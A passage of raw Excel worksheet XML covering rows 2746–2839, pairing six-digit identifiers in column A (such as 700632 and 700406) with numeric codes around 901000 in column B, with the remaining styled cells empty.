    <row r="2746" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2746" s="5">
        <v>700632</v>
      </c>
      <c r="B2746" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="D2746" s="5"/>
      <c r="E2746" s="3"/>
      <c r="F2746" s="1"/>
      <c r="H2746" s="1"/>
    </row>
    <row r="2747" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2747" s="5">
        <v>700632</v>
      </c>
      <c r="B2747" s="3">
        <v>901005</v>
      </c>
      <c r="D2747" s="5"/>
      <c r="E2747" s="3"/>
      <c r="F2747" s="1"/>
      <c r="H2747" s="1"/>
    </row>
    <row r="2748" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2748" s="5">
        <v>700632</v>
      </c>
      <c r="B2748" s="3">
        <v>901001.00100000005</v>
      </c>
      <c r="D2748" s="5"/>
      <c r="E2748" s="3"/>
      <c r="F2748" s="1"/>
      <c r="H2748" s="1"/>
    </row>
    <row r="2749" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2749" s="5">
        <v>700632</v>
      </c>
      <c r="B2749" s="3">
        <v>901140</v>
      </c>
      <c r="D2749" s="5"/>
      <c r="E2749" s="3"/>
      <c r="F2749" s="1"/>
      <c r="H2749" s="1"/>
    </row>
    <row r="2750" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2750" s="5">
        <v>700632</v>
      </c>
      <c r="B2750" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D2750" s="5"/>
      <c r="E2750" s="3"/>
      <c r="F2750" s="1"/>
      <c r="H2750" s="1"/>
    </row>
    <row r="2751" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2751" s="5">
        <v>700632</v>
      </c>
      <c r="B2751" s="3">
        <v>901573.00199999998</v>
      </c>
      <c r="D2751" s="5"/>
      <c r="E2751" s="3"/>
      <c r="F2751" s="1"/>
      <c r="H2751" s="1"/>
    </row>
    <row r="2752" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2752" s="5">
        <v>700632</v>
      </c>
      <c r="B2752" s="3">
        <v>901041</v>
      </c>
      <c r="D2752" s="5"/>
      <c r="E2752" s="3"/>
      <c r="F2752" s="1"/>
      <c r="H2752" s="1"/>
    </row>
    <row r="2753" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2753" s="5">
        <v>700632</v>
      </c>
      <c r="B2753" s="3">
        <v>901083</v>
      </c>
      <c r="D2753" s="5"/>
      <c r="E2753" s="3"/>
      <c r="F2753" s="1"/>
      <c r="H2753" s="1"/>
    </row>
    <row r="2754" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2754" s="5">
        <v>700632</v>
      </c>
      <c r="B2754" s="3">
        <v>901070</v>
      </c>
      <c r="D2754" s="5"/>
      <c r="E2754" s="3"/>
      <c r="F2754" s="1"/>
      <c r="H2754" s="1"/>
    </row>
    <row r="2755" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2755" s="5">
        <v>700632</v>
      </c>
      <c r="B2755" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D2755" s="5"/>
      <c r="E2755" s="3"/>
      <c r="F2755" s="1"/>
      <c r="H2755" s="1"/>
    </row>
    <row r="2756" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2756" s="5">
        <v>700632</v>
      </c>
      <c r="B2756" s="3">
        <v>901105</v>
      </c>
      <c r="D2756" s="5"/>
      <c r="E2756" s="3"/>
      <c r="F2756" s="1"/>
      <c r="H2756" s="1"/>
    </row>
    <row r="2757" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2757" s="5">
        <v>700632</v>
      </c>
      <c r="B2757" s="3">
        <v>901106</v>
      </c>
      <c r="D2757" s="5"/>
      <c r="E2757" s="3"/>
      <c r="F2757" s="1"/>
      <c r="H2757" s="1"/>
    </row>
    <row r="2758" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2758" s="5">
        <v>700632</v>
      </c>
      <c r="B2758" s="3">
        <v>901027</v>
      </c>
      <c r="D2758" s="5"/>
      <c r="E2758" s="3"/>
      <c r="F2758" s="1"/>
      <c r="H2758" s="1"/>
    </row>
    <row r="2759" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2759" s="5">
        <v>700632</v>
      </c>
      <c r="B2759" s="3">
        <v>901027.00100000005</v>
      </c>
      <c r="D2759" s="5"/>
      <c r="E2759" s="3"/>
      <c r="F2759" s="1"/>
      <c r="H2759" s="1"/>
    </row>
    <row r="2760" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2760" s="5">
        <v>700632</v>
      </c>
      <c r="B2760" s="3">
        <v>901053.005</v>
      </c>
      <c r="D2760" s="5"/>
      <c r="E2760" s="3"/>
      <c r="F2760" s="1"/>
      <c r="H2760" s="1"/>
    </row>
    <row r="2761" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2761" s="5">
        <v>700632</v>
      </c>
      <c r="B2761" s="3">
        <v>901082</v>
      </c>
      <c r="D2761" s="5"/>
      <c r="E2761" s="3"/>
      <c r="F2761" s="1"/>
      <c r="H2761" s="1"/>
    </row>
    <row r="2762" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2762" s="5">
        <v>700632</v>
      </c>
      <c r="B2762" s="3">
        <v>901614</v>
      </c>
      <c r="D2762" s="5"/>
      <c r="E2762" s="3"/>
      <c r="F2762" s="1"/>
      <c r="H2762" s="1"/>
    </row>
    <row r="2763" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2763" s="5">
        <v>700632</v>
      </c>
      <c r="B2763" s="3">
        <v>901614.00100000005</v>
      </c>
      <c r="D2763" s="5"/>
      <c r="E2763" s="3"/>
      <c r="F2763" s="1"/>
      <c r="H2763" s="1"/>
    </row>
    <row r="2764" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2764" s="5">
        <v>700632</v>
      </c>
      <c r="B2764" s="3">
        <v>901016</v>
      </c>
      <c r="D2764" s="5"/>
      <c r="E2764" s="3"/>
      <c r="F2764" s="1"/>
      <c r="H2764" s="1"/>
    </row>
    <row r="2765" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2765" s="5">
        <v>700632</v>
      </c>
      <c r="B2765" s="3">
        <v>901033</v>
      </c>
      <c r="D2765" s="5"/>
      <c r="E2765" s="3"/>
      <c r="F2765" s="1"/>
      <c r="H2765" s="1"/>
    </row>
    <row r="2766" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2766" s="5">
        <v>700632</v>
      </c>
      <c r="B2766" s="3">
        <v>901497.00300000003</v>
      </c>
      <c r="D2766" s="5"/>
      <c r="E2766" s="3"/>
      <c r="F2766" s="1"/>
      <c r="H2766" s="1"/>
    </row>
    <row r="2767" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2767" s="5">
        <v>700008</v>
      </c>
      <c r="B2767" s="3">
        <v>901003.00199999998</v>
      </c>
      <c r="D2767" s="5"/>
      <c r="E2767" s="3"/>
      <c r="F2767" s="1"/>
      <c r="H2767" s="1"/>
    </row>
    <row r="2768" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2768" s="5">
        <v>700008</v>
      </c>
      <c r="B2768" s="3">
        <v>901003.00399999996</v>
      </c>
      <c r="D2768" s="5"/>
      <c r="E2768" s="3"/>
      <c r="F2768" s="1"/>
      <c r="H2768" s="1"/>
    </row>
    <row r="2769" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2769" s="5">
        <v>700561</v>
      </c>
      <c r="B2769" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D2769" s="5"/>
      <c r="E2769" s="3"/>
      <c r="F2769" s="1"/>
      <c r="H2769" s="1"/>
    </row>
    <row r="2770" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2770" s="5">
        <v>700561</v>
      </c>
      <c r="B2770" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D2770" s="5"/>
      <c r="E2770" s="3"/>
      <c r="F2770" s="1"/>
      <c r="H2770" s="1"/>
    </row>
    <row r="2771" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2771" s="5">
        <v>700561</v>
      </c>
      <c r="B2771" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D2771" s="5"/>
      <c r="E2771" s="3"/>
      <c r="F2771" s="1"/>
      <c r="H2771" s="1"/>
    </row>
    <row r="2772" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2772" s="5">
        <v>700561</v>
      </c>
      <c r="B2772" s="3">
        <v>901105</v>
      </c>
      <c r="D2772" s="5"/>
      <c r="E2772" s="3"/>
      <c r="F2772" s="1"/>
      <c r="H2772" s="1"/>
    </row>
    <row r="2773" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2773" s="5">
        <v>700561</v>
      </c>
      <c r="B2773" s="3">
        <v>901106</v>
      </c>
      <c r="D2773" s="5"/>
      <c r="E2773" s="3"/>
      <c r="F2773" s="1"/>
      <c r="H2773" s="1"/>
    </row>
    <row r="2774" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2774" s="5">
        <v>700561</v>
      </c>
      <c r="B2774" s="3">
        <v>901566.00199999998</v>
      </c>
      <c r="D2774" s="5"/>
      <c r="E2774" s="3"/>
      <c r="F2774" s="1"/>
      <c r="H2774" s="1"/>
    </row>
    <row r="2775" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2775" s="5">
        <v>700561</v>
      </c>
      <c r="B2775" s="3">
        <v>901055</v>
      </c>
      <c r="D2775" s="5"/>
      <c r="E2775" s="3"/>
      <c r="F2775" s="1"/>
      <c r="H2775" s="1"/>
    </row>
    <row r="2776" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2776" s="5">
        <v>700561</v>
      </c>
      <c r="B2776" s="3">
        <v>901204.00100000005</v>
      </c>
      <c r="D2776" s="5"/>
      <c r="E2776" s="3"/>
      <c r="F2776" s="1"/>
      <c r="H2776" s="1"/>
    </row>
    <row r="2777" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2777" s="5">
        <v>700561</v>
      </c>
      <c r="B2777" s="3">
        <v>901204.00199999998</v>
      </c>
      <c r="D2777" s="5"/>
      <c r="E2777" s="3"/>
      <c r="F2777" s="1"/>
      <c r="H2777" s="1"/>
    </row>
    <row r="2778" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2778" s="5">
        <v>700561</v>
      </c>
      <c r="B2778" s="3">
        <v>901497.00100000005</v>
      </c>
      <c r="D2778" s="5"/>
      <c r="E2778" s="3"/>
      <c r="F2778" s="1"/>
      <c r="H2778" s="1"/>
    </row>
    <row r="2779" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2779" s="5">
        <v>700561</v>
      </c>
      <c r="B2779" s="3">
        <v>901497.00300000003</v>
      </c>
      <c r="D2779" s="5"/>
      <c r="E2779" s="3"/>
      <c r="F2779" s="1"/>
      <c r="H2779" s="1"/>
    </row>
    <row r="2780" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2780" s="5">
        <v>700561</v>
      </c>
      <c r="B2780" s="3">
        <v>901102</v>
      </c>
      <c r="D2780" s="5"/>
      <c r="E2780" s="3"/>
      <c r="F2780" s="1"/>
      <c r="H2780" s="1"/>
    </row>
    <row r="2781" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2781" s="5">
        <v>700406</v>
      </c>
      <c r="B2781" s="3">
        <v>901432</v>
      </c>
      <c r="D2781" s="5"/>
      <c r="E2781" s="3"/>
      <c r="F2781" s="1"/>
      <c r="H2781" s="1"/>
    </row>
    <row r="2782" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2782" s="5">
        <v>700406</v>
      </c>
      <c r="B2782" s="3">
        <v>901438</v>
      </c>
      <c r="D2782" s="5"/>
      <c r="E2782" s="3"/>
      <c r="F2782" s="1"/>
      <c r="H2782" s="1"/>
    </row>
    <row r="2783" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2783" s="5">
        <v>700406</v>
      </c>
      <c r="B2783" s="3">
        <v>901418</v>
      </c>
      <c r="D2783" s="5"/>
      <c r="E2783" s="3"/>
      <c r="F2783" s="1"/>
      <c r="H2783" s="1"/>
    </row>
    <row r="2784" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2784" s="5">
        <v>700406</v>
      </c>
      <c r="B2784" s="3">
        <v>901412</v>
      </c>
      <c r="D2784" s="5"/>
      <c r="E2784" s="3"/>
      <c r="F2784" s="1"/>
      <c r="H2784" s="1"/>
    </row>
    <row r="2785" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2785" s="5">
        <v>700406</v>
      </c>
      <c r="B2785" s="3">
        <v>901533</v>
      </c>
      <c r="D2785" s="5"/>
      <c r="E2785" s="3"/>
      <c r="F2785" s="1"/>
      <c r="H2785" s="1"/>
    </row>
    <row r="2786" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2786" s="5">
        <v>700406</v>
      </c>
      <c r="B2786" s="3">
        <v>901476</v>
      </c>
      <c r="D2786" s="5"/>
      <c r="E2786" s="3"/>
      <c r="F2786" s="1"/>
      <c r="H2786" s="1"/>
    </row>
    <row r="2787" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2787" s="5">
        <v>700406</v>
      </c>
      <c r="B2787" s="3">
        <v>901417</v>
      </c>
      <c r="D2787" s="5"/>
      <c r="E2787" s="3"/>
      <c r="F2787" s="1"/>
      <c r="H2787" s="1"/>
    </row>
    <row r="2788" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2788" s="5">
        <v>700406</v>
      </c>
      <c r="B2788" s="3">
        <v>901516</v>
      </c>
      <c r="D2788" s="5"/>
      <c r="E2788" s="3"/>
      <c r="F2788" s="1"/>
      <c r="H2788" s="1"/>
    </row>
    <row r="2789" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2789" s="5">
        <v>700406</v>
      </c>
      <c r="B2789" s="3">
        <v>901411</v>
      </c>
      <c r="D2789" s="5"/>
      <c r="E2789" s="3"/>
      <c r="F2789" s="1"/>
      <c r="H2789" s="1"/>
    </row>
    <row r="2790" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2790" s="5">
        <v>700406</v>
      </c>
      <c r="B2790" s="3">
        <v>901406</v>
      </c>
      <c r="D2790" s="5"/>
      <c r="E2790" s="3"/>
      <c r="F2790" s="1"/>
      <c r="H2790" s="1"/>
    </row>
    <row r="2791" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2791" s="5">
        <v>700406</v>
      </c>
      <c r="B2791" s="3">
        <v>901437</v>
      </c>
      <c r="D2791" s="5"/>
      <c r="E2791" s="3"/>
      <c r="F2791" s="1"/>
      <c r="H2791" s="1"/>
    </row>
    <row r="2792" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2792" s="5">
        <v>700406</v>
      </c>
      <c r="B2792" s="3">
        <v>901508</v>
      </c>
      <c r="D2792" s="5"/>
      <c r="E2792" s="3"/>
      <c r="F2792" s="1"/>
      <c r="H2792" s="1"/>
    </row>
    <row r="2793" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2793" s="5">
        <v>700406</v>
      </c>
      <c r="B2793" s="3">
        <v>901426</v>
      </c>
      <c r="D2793" s="5"/>
      <c r="E2793" s="3"/>
      <c r="F2793" s="1"/>
      <c r="H2793" s="1"/>
    </row>
    <row r="2794" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2794" s="5">
        <v>700406</v>
      </c>
      <c r="B2794" s="3">
        <v>901422</v>
      </c>
      <c r="D2794" s="5"/>
      <c r="E2794" s="3"/>
      <c r="F2794" s="1"/>
      <c r="H2794" s="1"/>
    </row>
    <row r="2795" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2795" s="5">
        <v>700132</v>
      </c>
      <c r="B2795" s="3">
        <v>901548.00199999998</v>
      </c>
      <c r="D2795" s="5"/>
      <c r="E2795" s="3"/>
      <c r="F2795" s="1"/>
      <c r="H2795" s="1"/>
    </row>
    <row r="2796" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2796" s="5">
        <v>700132</v>
      </c>
      <c r="B2796" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D2796" s="5"/>
      <c r="E2796" s="3"/>
      <c r="F2796" s="1"/>
      <c r="H2796" s="1"/>
    </row>
    <row r="2797" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2797" s="5">
        <v>700132</v>
      </c>
      <c r="B2797" s="3">
        <v>901555.00300000003</v>
      </c>
      <c r="D2797" s="5"/>
      <c r="E2797" s="3"/>
      <c r="F2797" s="1"/>
      <c r="H2797" s="1"/>
    </row>
    <row r="2798" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2798" s="5">
        <v>700132</v>
      </c>
      <c r="B2798" s="3">
        <v>901132</v>
      </c>
      <c r="D2798" s="5"/>
      <c r="E2798" s="3"/>
      <c r="F2798" s="1"/>
      <c r="H2798" s="1"/>
    </row>
    <row r="2799" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2799" s="5">
        <v>700132</v>
      </c>
      <c r="B2799" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D2799" s="5"/>
      <c r="E2799" s="3"/>
      <c r="F2799" s="1"/>
      <c r="H2799" s="1"/>
    </row>
    <row r="2800" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2800" s="5">
        <v>700132</v>
      </c>
      <c r="B2800" s="3">
        <v>901562.00100000005</v>
      </c>
      <c r="D2800" s="5"/>
      <c r="E2800" s="3"/>
      <c r="F2800" s="1"/>
      <c r="H2800" s="1"/>
    </row>
    <row r="2801" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2801" s="5">
        <v>700132</v>
      </c>
      <c r="B2801" s="3">
        <v>901562.00399999996</v>
      </c>
      <c r="D2801" s="5"/>
      <c r="E2801" s="3"/>
      <c r="F2801" s="1"/>
      <c r="H2801" s="1"/>
    </row>
    <row r="2802" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2802" s="5">
        <v>700132</v>
      </c>
      <c r="B2802" s="3">
        <v>901105</v>
      </c>
      <c r="D2802" s="5"/>
      <c r="E2802" s="3"/>
      <c r="F2802" s="1"/>
      <c r="H2802" s="1"/>
    </row>
    <row r="2803" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2803" s="5">
        <v>700132</v>
      </c>
      <c r="B2803" s="3">
        <v>901490</v>
      </c>
      <c r="D2803" s="5"/>
      <c r="E2803" s="3"/>
      <c r="F2803" s="1"/>
      <c r="H2803" s="1"/>
    </row>
    <row r="2804" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2804" s="5">
        <v>700132</v>
      </c>
      <c r="B2804" s="3">
        <v>901027</v>
      </c>
      <c r="D2804" s="5"/>
      <c r="E2804" s="3"/>
      <c r="F2804" s="1"/>
      <c r="H2804" s="1"/>
    </row>
    <row r="2805" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2805" s="5">
        <v>700132</v>
      </c>
      <c r="B2805" s="3">
        <v>901027.00199999998</v>
      </c>
      <c r="D2805" s="5"/>
      <c r="E2805" s="3"/>
      <c r="F2805" s="1"/>
      <c r="H2805" s="1"/>
    </row>
    <row r="2806" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2806" s="5">
        <v>700132</v>
      </c>
      <c r="B2806" s="3">
        <v>901091</v>
      </c>
      <c r="D2806" s="5"/>
      <c r="E2806" s="3"/>
      <c r="F2806" s="1"/>
      <c r="H2806" s="1"/>
    </row>
    <row r="2807" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2807" s="5">
        <v>700132</v>
      </c>
      <c r="B2807" s="3">
        <v>901080</v>
      </c>
      <c r="D2807" s="5"/>
      <c r="E2807" s="3"/>
      <c r="F2807" s="1"/>
      <c r="H2807" s="1"/>
    </row>
    <row r="2808" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2808" s="5">
        <v>700047</v>
      </c>
      <c r="B2808" s="3">
        <v>901542.00100000005</v>
      </c>
      <c r="D2808" s="5"/>
      <c r="E2808" s="3"/>
      <c r="F2808" s="1"/>
      <c r="H2808" s="1"/>
    </row>
    <row r="2809" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2809" s="5">
        <v>700047</v>
      </c>
      <c r="B2809" s="3">
        <v>901014</v>
      </c>
      <c r="D2809" s="5"/>
      <c r="E2809" s="3"/>
      <c r="F2809" s="1"/>
      <c r="H2809" s="1"/>
    </row>
    <row r="2810" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2810" s="5">
        <v>700151</v>
      </c>
      <c r="B2810" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D2810" s="5"/>
      <c r="E2810" s="3"/>
      <c r="F2810" s="1"/>
      <c r="H2810" s="1"/>
    </row>
    <row r="2811" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2811" s="5">
        <v>700151</v>
      </c>
      <c r="B2811" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D2811" s="5"/>
      <c r="E2811" s="3"/>
      <c r="F2811" s="1"/>
      <c r="H2811" s="1"/>
    </row>
    <row r="2812" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2812" s="5">
        <v>700151</v>
      </c>
      <c r="B2812" s="3">
        <v>901057</v>
      </c>
      <c r="D2812" s="5"/>
      <c r="E2812" s="3"/>
      <c r="F2812" s="1"/>
      <c r="H2812" s="1"/>
    </row>
    <row r="2813" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2813" s="5">
        <v>700151</v>
      </c>
      <c r="B2813" s="3">
        <v>901113</v>
      </c>
      <c r="D2813" s="5"/>
      <c r="E2813" s="3"/>
      <c r="F2813" s="1"/>
      <c r="H2813" s="1"/>
    </row>
    <row r="2814" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2814" s="5">
        <v>700151</v>
      </c>
      <c r="B2814" s="3">
        <v>901082</v>
      </c>
      <c r="D2814" s="5"/>
      <c r="E2814" s="3"/>
      <c r="F2814" s="1"/>
      <c r="H2814" s="1"/>
    </row>
    <row r="2815" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2815" s="5">
        <v>700151</v>
      </c>
      <c r="B2815" s="3">
        <v>901047</v>
      </c>
      <c r="D2815" s="5"/>
      <c r="E2815" s="3"/>
      <c r="F2815" s="1"/>
      <c r="H2815" s="1"/>
    </row>
    <row r="2816" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2816" s="5">
        <v>700037</v>
      </c>
      <c r="B2816" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D2816" s="5"/>
      <c r="E2816" s="3"/>
      <c r="F2816" s="1"/>
      <c r="H2816" s="1"/>
    </row>
    <row r="2817" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2817" s="5">
        <v>700037</v>
      </c>
      <c r="B2817" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D2817" s="5"/>
      <c r="E2817" s="3"/>
      <c r="F2817" s="1"/>
      <c r="H2817" s="1"/>
    </row>
    <row r="2818" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2818" s="5">
        <v>700037</v>
      </c>
      <c r="B2818" s="3">
        <v>901001.00199999998</v>
      </c>
      <c r="D2818" s="5"/>
      <c r="E2818" s="3"/>
      <c r="F2818" s="1"/>
      <c r="H2818" s="1"/>
    </row>
    <row r="2819" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2819" s="5">
        <v>700037</v>
      </c>
      <c r="B2819" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D2819" s="5"/>
      <c r="E2819" s="3"/>
      <c r="F2819" s="1"/>
      <c r="H2819" s="1"/>
    </row>
    <row r="2820" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2820" s="5">
        <v>700037</v>
      </c>
      <c r="B2820" s="3">
        <v>901564.00300000003</v>
      </c>
      <c r="D2820" s="5"/>
      <c r="E2820" s="3"/>
      <c r="F2820" s="1"/>
      <c r="H2820" s="1"/>
    </row>
    <row r="2821" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2821" s="5">
        <v>700037</v>
      </c>
      <c r="B2821" s="3">
        <v>901102.00300000003</v>
      </c>
      <c r="D2821" s="5"/>
      <c r="E2821" s="3"/>
      <c r="F2821" s="1"/>
      <c r="H2821" s="1"/>
    </row>
    <row r="2822" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2822" s="5">
        <v>700499</v>
      </c>
      <c r="B2822" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D2822" s="5"/>
      <c r="E2822" s="3"/>
      <c r="F2822" s="1"/>
      <c r="H2822" s="1"/>
    </row>
    <row r="2823" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2823" s="5">
        <v>700499</v>
      </c>
      <c r="B2823" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D2823" s="5"/>
      <c r="E2823" s="3"/>
      <c r="F2823" s="1"/>
      <c r="H2823" s="1"/>
    </row>
    <row r="2824" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2824" s="5">
        <v>700499</v>
      </c>
      <c r="B2824" s="3">
        <v>901140</v>
      </c>
      <c r="D2824" s="5"/>
      <c r="E2824" s="3"/>
      <c r="F2824" s="1"/>
      <c r="H2824" s="1"/>
    </row>
    <row r="2825" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2825" s="5">
        <v>700499</v>
      </c>
      <c r="B2825" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D2825" s="5"/>
      <c r="E2825" s="3"/>
      <c r="F2825" s="1"/>
      <c r="H2825" s="1"/>
    </row>
    <row r="2826" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2826" s="5">
        <v>700499</v>
      </c>
      <c r="B2826" s="3">
        <v>901105</v>
      </c>
      <c r="D2826" s="5"/>
      <c r="E2826" s="3"/>
      <c r="F2826" s="1"/>
      <c r="H2826" s="1"/>
    </row>
    <row r="2827" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2827" s="5">
        <v>700499</v>
      </c>
      <c r="B2827" s="3">
        <v>901106</v>
      </c>
      <c r="D2827" s="5"/>
      <c r="E2827" s="3"/>
      <c r="F2827" s="1"/>
      <c r="H2827" s="1"/>
    </row>
    <row r="2828" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2828" s="5">
        <v>700499</v>
      </c>
      <c r="B2828" s="3">
        <v>901027</v>
      </c>
      <c r="D2828" s="5"/>
      <c r="E2828" s="3"/>
      <c r="F2828" s="1"/>
      <c r="H2828" s="1"/>
    </row>
    <row r="2829" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2829" s="5">
        <v>700499</v>
      </c>
      <c r="B2829" s="3">
        <v>901566.00100000005</v>
      </c>
      <c r="D2829" s="5"/>
      <c r="E2829" s="3"/>
      <c r="F2829" s="1"/>
      <c r="H2829" s="1"/>
    </row>
    <row r="2830" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2830" s="5">
        <v>700499</v>
      </c>
      <c r="B2830" s="3">
        <v>901566.00199999998</v>
      </c>
      <c r="D2830" s="5"/>
      <c r="E2830" s="3"/>
      <c r="F2830" s="1"/>
      <c r="H2830" s="1"/>
    </row>
    <row r="2831" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2831" s="5">
        <v>700499</v>
      </c>
      <c r="B2831" s="3">
        <v>901218.01199999999</v>
      </c>
      <c r="D2831" s="5"/>
      <c r="E2831" s="3"/>
      <c r="F2831" s="1"/>
      <c r="H2831" s="1"/>
    </row>
    <row r="2832" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2832" s="5">
        <v>700499</v>
      </c>
      <c r="B2832" s="3">
        <v>901204.00100000005</v>
      </c>
      <c r="D2832" s="5"/>
      <c r="E2832" s="3"/>
      <c r="F2832" s="1"/>
      <c r="H2832" s="1"/>
    </row>
    <row r="2833" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2833" s="5">
        <v>700499</v>
      </c>
      <c r="B2833" s="3">
        <v>901204.00199999998</v>
      </c>
      <c r="D2833" s="5"/>
      <c r="E2833" s="3"/>
      <c r="F2833" s="1"/>
      <c r="H2833" s="1"/>
    </row>
    <row r="2834" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2834" s="5">
        <v>700499</v>
      </c>
      <c r="B2834" s="3">
        <v>901497</v>
      </c>
      <c r="D2834" s="5"/>
      <c r="E2834" s="3"/>
      <c r="F2834" s="1"/>
      <c r="H2834" s="1"/>
    </row>
    <row r="2835" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2835" s="5">
        <v>700214</v>
      </c>
      <c r="B2835" s="3">
        <v>901105</v>
      </c>
      <c r="D2835" s="5"/>
      <c r="E2835" s="3"/>
      <c r="F2835" s="1"/>
      <c r="H2835" s="1"/>
    </row>
    <row r="2836" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2836" s="5">
        <v>700214</v>
      </c>
      <c r="B2836" s="3">
        <v>901082</v>
      </c>
      <c r="D2836" s="5"/>
      <c r="E2836" s="3"/>
      <c r="F2836" s="1"/>
      <c r="H2836" s="1"/>
    </row>
    <row r="2837" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2837" s="5">
        <v>700214</v>
      </c>
      <c r="B2837" s="3">
        <v>901033</v>
      </c>
      <c r="D2837" s="5"/>
      <c r="E2837" s="3"/>
      <c r="F2837" s="1"/>
      <c r="H2837" s="1"/>
    </row>
    <row r="2838" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2838" s="5">
        <v>700246</v>
      </c>
      <c r="B2838" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D2838" s="5"/>
      <c r="E2838" s="3"/>
      <c r="F2838" s="1"/>
      <c r="H2838" s="1"/>
    </row>
    <row r="2839" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2839" s="5">
        <v>700246</v>
      </c>
      <c r="B2839" s="3">
        <v>901001.00300000003</v>
